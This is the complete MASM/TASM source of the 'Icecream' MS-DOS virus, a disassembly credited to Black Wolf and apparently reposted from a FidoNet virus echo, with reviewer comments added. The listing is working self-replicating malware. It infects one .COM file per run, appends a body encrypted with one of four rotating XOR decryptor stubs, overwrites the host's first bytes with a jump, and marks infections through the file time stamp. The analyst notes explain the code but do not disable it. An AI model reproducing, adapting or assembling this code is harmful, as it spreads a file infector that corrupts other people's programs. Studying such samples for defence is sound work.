MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir51.asm

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 41 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ICECREAM.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 17:48)
;* To : Ron Toler
;* Subj : ICECREAM.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;Icecream Virus by the TridenT virus research group.
;This is a simple direct-action com virus that uses one of
;4 encryption algorithms to encrypt itself each time it infects a file.
;It will infect one .COM file in the current directory every time it is
;executed. It marks infections with the time stamp.
;Disassembly by Black Wolf
;-----------------------------------------------------------------------
; Analyst notes (review): 16-bit DOS .COM direct-action infector in
; MASM/TASM syntax (.model tiny / org 100h).  All offsets below refer to
; the original image loaded at 100h; bp holds the load delta computed at
; Get_Offset and is added to every data reference so the same code runs
; from wherever it was appended to a host.
;
; Observable artifacts, all visible in this listing:
;  - infection marker: file-time "seconds/2" field (low 5 bits of cx
;    from int 21h/5700h) == 1
;  - DTA moved to 0F900h; the outgoing image is assembled at 0FA00h and
;    written as 1F5h bytes (0Ch-byte decryptor stub + 1E9h-byte body)
;  - hand-encoded opcodes (db ...) and immediates patched at run time
;    (EncPtrN+1 / EncSizeN+1, byte at 10Dh) -> self-modifying code
;  - a 3-byte jmp is written at host offset 0; the original bytes are
;    kept in Storage and put back at 100h before the host runs
;-----------------------------------------------------------------------
.model tiny
.code
org 100h
start:
db 0e9h,0ch,0 ;jmp Virus_Entry  (hand-encoded near jmp: 3+10+2 bytes -> 10Fh)
Author_Name db 'John Tardy' ; 103h..10Ch; overwritten by the decryptor stub in SetupEncryption
db 0E2h,0FAh ; 10Dh/10Eh: tail of the 12-byte stub; bit 1 of 10Dh is toggled per generation
Virus_Entry:
push ax ; preserve the host's entry ax (popped again at Restore_DTA)
call Get_Offset
Get_Offset:
pop ax ; ax = run-time address of Get_Offset
sub ax,offset Get_Offset ; ax = load delta (0 in the original image)
db 89h,0c5h ;mov bp,ax  (hand-encoded; bp = delta for all data references)
lea si,[bp+Storage]
mov di,100h ;Restore file  -- copy the 3 saved host bytes back to 100h
movsw
movsb
mov ah,1Ah
mov dx,0f900h
int 21h ;Set DTA  -- private DTA at 0F900h, leaving the PSP DTA at 80h intact
mov ah,4Eh
FindFirstNext: ; ah = 4Eh (find first) here, 4Fh (find next) when re-entered from DoneInfect
lea dx,[bp+ComMask]
xor cx,cx ; attribute mask 0: normal files only
int 21h ;Find File
jnc InfectFile
Restore_DTA:
mov ah,1Ah
mov dx,80h
int 21h ;Set DTA to default
mov bx,offset start
pop ax ;Return to host  -- ax saved at Virus_Entry
push bx
retn ; push 100h / retn: transfer to the restored host entry point
InfectFile:
mov ax,4300h
mov dx,0f91eh ; DTA+1Eh = name of the file just found
int 21h ;Get file attribs
push cx ;save 'em  (restored in FinishFile)
mov ax,4301h
xor cx,cx
int 21h ;Set them to 0  -- clears read-only/hidden/system so the open for write succeeds
mov ax,3D02h
int 21h ;Open file  (read/write; handle in ax)
mov bx,5700h
xchg ax,bx ; bx = handle, ax = 5700h
int 21h ;Get file time  (cx = time, dx = date)
push cx
push dx ;save it  (consumed by FinishFile, or re-pushed below with the marker set)
and cx,1Fh ; seconds/2 field of the DOS time word
cmp cx,1 ;check for infection  -- marker value is 1
jne ContinueInfection
db 0e9h,69h,0 ;jmp DoneInfect  (hand-encoded 3-byte jmp; presumably keeps the byte layout fixed for the hard-coded offsets -- not verified)
ContinueInfection:
mov ah,3Fh
lea dx,[bp+Storage]
mov cx,3
int 21h ;Read in first 3 bytes  -- original host bytes, restored at 100h on the next run
mov ax,cs:[Storage+bp]
cmp ax,4D5Ah ;Is it an EXE?  ('ZM' as a little-endian word)
je DoneInfect
cmp ax,5A4Dh
je DoneInfect ;Other EXE signature?  ('MZ')
pop dx
pop cx
and cx,0FFE0h ;Change stored time values
or cx,1 ;to mark infection  -- seconds field := 1; written back by FinishFile (5701h)
push cx
push dx
mov ax,4202h ;Go to the end of the file  (ax = file size on return)
call Move_FP
sub ax,3 ; displacement of the jmp at offset 0: size-3 lands at 100h+size, where the image is appended
mov cs:[JumpSize+bp],ax ;Save jump size
add ax,10Fh ;Save encryption starting  -- (size-3)+10Fh = host_size+10Ch = first encrypted byte in the new host
mov word ptr [bp+EncPtr1+1],ax ;point....  (patches the immediate of the mov in each template -- self-modifying)
mov word ptr [bp+EncPtr2+1],ax
mov word ptr [bp+EncPtr3+1],ax
mov word ptr [bp+EncPtr4+1],ax
call SetupEncryption ;Encrypt virus  -- builds the 1F5h-byte image at 0FA00h
mov ah,40h
mov dx,0fa00h
mov cx,1F5h ; 0Ch stub + 1E9h body
int 21h ;Write virus to file  (appended at the old end of file)
mov ax,4200h
call Move_FP ;Go to the beginning of file
mov ah,40h
lea dx,[bp+JumpBytes]
mov cx,3
int 21h ;Write in jump  -- E9h + JumpSize over the host's first 3 bytes
call FinishFile
jmp Restore_DTA ; one infection per run
DoneInfect:
call FinishFile
mov ah,4Fh ; find next
jmp FindFirstNext
Move_FP: ; in: ax = 42xxh seek mode, bx = handle; seeks to cx:dx = 0; out: dx:ax = new position
xor cx,cx
xor dx,dx
int 21h
ret
FinishFile: ; stack on entry: [ret][date][time][attribs]; restores time/date, closes, restores attribs
pop si dx cx ; TASM multi-operand pop: si = return address, dx = date, cx = time
mov ax,5701h ;Reset file time/date stamp
int 21h ;(or mark infection)
mov ah,3Eh
int 21h ;Close new host file
mov ax,4301h
pop cx ; original attributes saved in InfectFile
mov dx,0fc1eh ; NOTE(review): differs from the 0F91Eh (DTA+1Eh) used for the attribute read; if assembled as shown, the restore targets a different buffer -- verify against a sample
int 21h ;Restore old attributes
push si
retn
Message db ' I scream, you scream, we both ' ; not referenced by code in this listing
db 'scream for an ice-cream! '
SetupEncryption: ; builds decryptor stub at 103h, copies it plus the xored body to 0FA00h; out: dl = key
xor byte ptr [bp+10Dh],2 ; toggle bit 1 of the stub's byte at 10Dh (0E2h <-> 0E0h) each generation
xor ax,ax
mov es,ax
mov ax,es:[46ch] ;Get random number  -- BIOS timer tick count at 0000:046Ch
push cs
pop es ; es = cs again for the string ops below
push ax ; keep the tick value (reused for template choice and key)
and ax,7FFh
add ax,1E9h ; loop count for the stub: 1E9h..9E8h; only 1E9h bytes are actually xored below, so extra iterations run over whatever follows the body in memory
mov word ptr [bp+EncSize1+1],ax ; patch the count immediate in every template
mov word ptr [bp+EncSize2+1],ax
mov word ptr [bp+EncSize3+1],ax
mov word ptr [bp+EncSize4+1],ax
pop ax
push ax
and ax,3 ; pick one of the four templates
shl ax,1 ; word index into EncData1..4
mov si,ax
mov ax,[bp+si+EncData1] ; presumably the template's offset (the four EncData values are 9 bytes apart, one 9-byte template each)
add ax,bp
mov si,ax
lea di,[bp+103h] ; stub is assembled in place over Author_Name
movsw
movsw
movsw
movsw ;Copy Encryption Algorithm  (8 bytes: two movs plus the opcode/modrm of the xor)
pop ax
stosb ; low byte of the tick value becomes the xor immediate at 10Bh (the key)
movsb ; byte after the immediate in the template (46h/47h) lands at 10Ch
mov dl,al ; dl = key
lea si,[bp+103h]
mov di,0fa00h
mov cx,0Ch
rep movsb ; 12-byte stub (103h..10Eh) -> 0FA00h
lea si,[bp+10Fh] ; body starts at Virus_Entry
mov cx,1E9h
EncryptVirus: ; write key-xored body after the stub (di continues at 0FA0Ch)
lodsb
db 30h,0d0h ;xor al,dl  (hand-encoded)
stosb
loop EncryptVirus
cmp dl,0
je KeyWasZero
retn
KeyWasZero: ;If key is zero, increase  -- body is unchanged, so the stub is not needed
mov si,offset AuthorName ;jump size and place name  -- NOTE(review): no bp delta here, unlike every other data reference
mov di,0fa00h ;at beginning....
mov cx,0Ah
rep movsb ; overwrites the first 10 bytes of the stub with the name
mov ax,cs:[JumpSize+bp]
add ax,0Ch ; skip the 0Ch-byte stub area: entry goes straight to the body
mov cs:[JumpSize+bp],ax
retn
db '[TridenT]'
EncData1 dw 02beh ; offsets of the four stub templates below (9 bytes apart)
EncData2 dw 02c7h
EncData3 dw 02d0h
EncData4 dw 02d9h
Encryptions: ; templates; immediates at EncPtrN+1 / EncSizeN+1 are patched before use
;------------------------------------------------------------
EncPtr1:
mov si,0
EncSize1:
mov cx,0
xor byte ptr [si],46h ; the 46h immediate is replaced by the key; in the built stub it reads as inc si (46h) after the key
;------------------------------------------------------------
EncPtr2:
mov di,0
EncSize2:
mov cx,0
xor byte ptr [di],47h ; likewise, 47h = inc di
;------------------------------------------------------------
EncSize3:
mov cx,0
EncPtr3:
mov si,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncSize4:
mov cx,0
EncPtr4:
mov di,0
xor byte ptr [di],47h
;------------------------------------------------------------
AuthorName db 'John Tardy' ; used only on the key-zero path
JumpBytes db 0E9h ; 3 bytes written at host offset 0: E9h + JumpSize
JumpSize dw 0
ComMask db '*.CoM',0
Storage dw 20CDh ; original image: int 20h (CDh 20h) + 21h, so the original program just terminates;
db 21h ; in an infected host these 3 bytes hold the host's original first bytes
end start
;-+- GEcho 1.10+
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/x Include false conditionals in listing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)